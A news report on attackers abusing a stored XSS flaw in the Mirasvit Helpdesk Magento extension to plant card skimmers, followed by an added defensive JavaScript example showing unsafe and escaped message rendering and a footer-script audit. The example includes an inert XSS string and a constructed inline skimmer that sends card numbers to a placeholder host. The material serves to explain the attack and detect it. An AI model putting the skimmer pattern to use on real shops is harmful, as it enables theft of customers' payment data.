Hackers are actively targeting Magento sites running a popular helpdesk extension, Dutch security researcher Willem de Groot has discovered.
The avenue for these attacks is Mirasvit Helpdesk, a Magento extension that lets shops show a "Chat with us" widget to their customers.
In September 2017, Hungarian security firm WebShield published details about two vulnerabilities affecting the Mirasvit Helpdesk extension.
Experts warned that all versions of the Mirasvit Helpdesk extension released up to that point (until version 1.5.2) were vulnerable to these two flaws.
The first allowed attackers to upload files to the underlying Magento server (CVE-2017-14320), while the second was a cross-site scripting (XSS) issue (CVE-2017-14321) that, on its face, looked like the lesser of the two.
Chat widget used to infect stores with card stealer malware
Today, de Groot published the findings of his investigation into a hacked Magento store, and says the attackers used the second flaw, the XSS, to breach it.

According to de Groot, the attackers submitted messages through the Mirasvit Helpdesk chat widget that looked like ordinary customer enquiries but carried an XSS payload. Because the widget stores every message in the Magento database, the payload was saved along with the text.

When support staff later opened the recent messages in the store's backend, the message was displayed as harmless text that read something like:
Hey, I strongly recommend you to make a redesign! Please contact me if you need a good designer! – knockers@yahoo.com
The malicious code itself was not visible, but by the time the store owner had read this message, the payload had already executed in their browser, with the privileges of their backend session.

De Groot says the payload then inserted additional malicious code into the store's footer section. Because the footer is included on every page, this code ran on all of the store's pages, and its job was to harvest payment card data entered during checkout.
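The two halves of the chain described above, the stored message that becomes backend XSS and the script later injected into the footer, are shown below as an added example. This is not code from the article, from de Groot or from Mirasvit: the message, the footer fragment, the field name `cc_number` and the host `collector.invalid` are all constructed for illustration, and the payload is an inert comment. The first part contrasts the unsafe rendering pattern behind a stored XSS with the escaped rendering that keeps the message as text; the second part is a simple audit that lists the scripts in a page footer and flags external sources outside an allowlist and inline code that touches card fields and makes a network call, which is the kind of check a shop owner could run against their own rendered pages after reading this story.

```javascript
// Added example, not code from the article or from Mirasvit. It models the
// attack chain with constructed data: a helpdesk message carrying an XSS
// payload, the unsafe and the escaped way of rendering it in the backend,
// and a check for a script injected into a store footer.

// Constructed message: the quoted text plus a hypothetical inert payload.
// The onerror body is only a comment, so nothing runs even if this string
// is ever rendered as HTML by mistake.
const STORED_MESSAGE =
  'Hey, I strongly recommend you to make a redesign! ' +
  'Please contact me if you need a good designer! - knockers@yahoo.com' +
  '<img src=x onerror="/* payload would go here */">';

// Vulnerable pattern: customer-controlled text interpolated straight into
// the admin page. Whatever the customer typed becomes markup for the agent.
function renderMessageUnsafe(msg) {
  return `<div class="ticket-message">${msg}</div>`;
}

// Escape the characters HTML treats as syntax, so the message stays text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderMessageSafe(msg) {
  return `<div class="ticket-message">${escapeHtml(msg)}</div>`;
}

// Does a rendered fragment still contain something a browser would execute?
// Matches only inside a real tag, so escaped text like "&lt;img onerror="
// is not reported.
const ACTIVE_HTML =
  /<(script|iframe|object|embed)\b|<[a-z][^>]*\son[a-z]+\s*=|<[a-z][^>]*javascript:/i;

function containsActiveContent(html) {
  return ACTIVE_HTML.test(html);
}

// Constructed footer fragment standing in for a store page. The third script
// is a hypothetical skimmer: it reads a card field and ships it off-site.
// collector.invalid is a reserved, non-resolving name used as a placeholder.
const SAMPLE_FOOTER = `
<footer class="page-footer">
  <script src="/static/frontend/footer.js"></script>
  <script src="https://cdn.example/lib.js"></script>
  <script>
    document.addEventListener('submit', function () {
      var cc = document.querySelector('[name="cc_number"]').value;
      new Image().src = 'https://collector.invalid/?d=' + btoa(cc);
    });
  </script>
</footer>`;

// Crude indicators: the field names a checkout form exposes, and the ways
// inline code typically sends data somewhere.
const CARD_FIELD = /cc_number|cc_cid|cvv|card|expir/i;
const EXFIL_CALL = /new Image\(\)|fetch\(|XMLHttpRequest|sendBeacon|WebSocket/;

// List the script tags in a page fragment and flag the ones that do not
// belong: external sources outside the allowlist, and inline code that both
// reads card fields and makes a network call. Returns findings, not a verdict.
function auditFooterScripts(html, allowedHosts, baseUrl = 'https://shop.example/') {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const src = /\ssrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    if (src) {
      // Relative paths resolve against the shop itself; absolute ones keep
      // their own host, which is what we compare against the allowlist.
      const host = new URL(src[1], baseUrl).hostname;
      if (!allowedHosts.includes(host)) {
        findings.push({ kind: 'external-script', detail: src[1] });
      }
    } else if (CARD_FIELD.test(body) && EXFIL_CALL.test(body)) {
      findings.push({ kind: 'inline-skimmer', detail: body.trim().split('\n')[0] });
    }
  }
  return findings;
}

// Stand-alone run: show both renderings and the audit result.
console.log(containsActiveContent(renderMessageUnsafe(STORED_MESSAGE))); // true
console.log(containsActiveContent(renderMessageSafe(STORED_MESSAGE)));   // false
console.log(auditFooterScripts(SAMPLE_FOOTER, ['shop.example', 'cdn.example']));
```

The audit is deliberately a string-level check rather than a full HTML parser: it is meant to be run over the HTML a store actually serves (for example the output of `curl` against the checkout page) to give a quick list of every script in the footer and where it loads from. An allowlist that names only the shop's own host and its known CDN turns any new external source, and any inline script that reads card fields and makes a network call, into a finding worth a closer look.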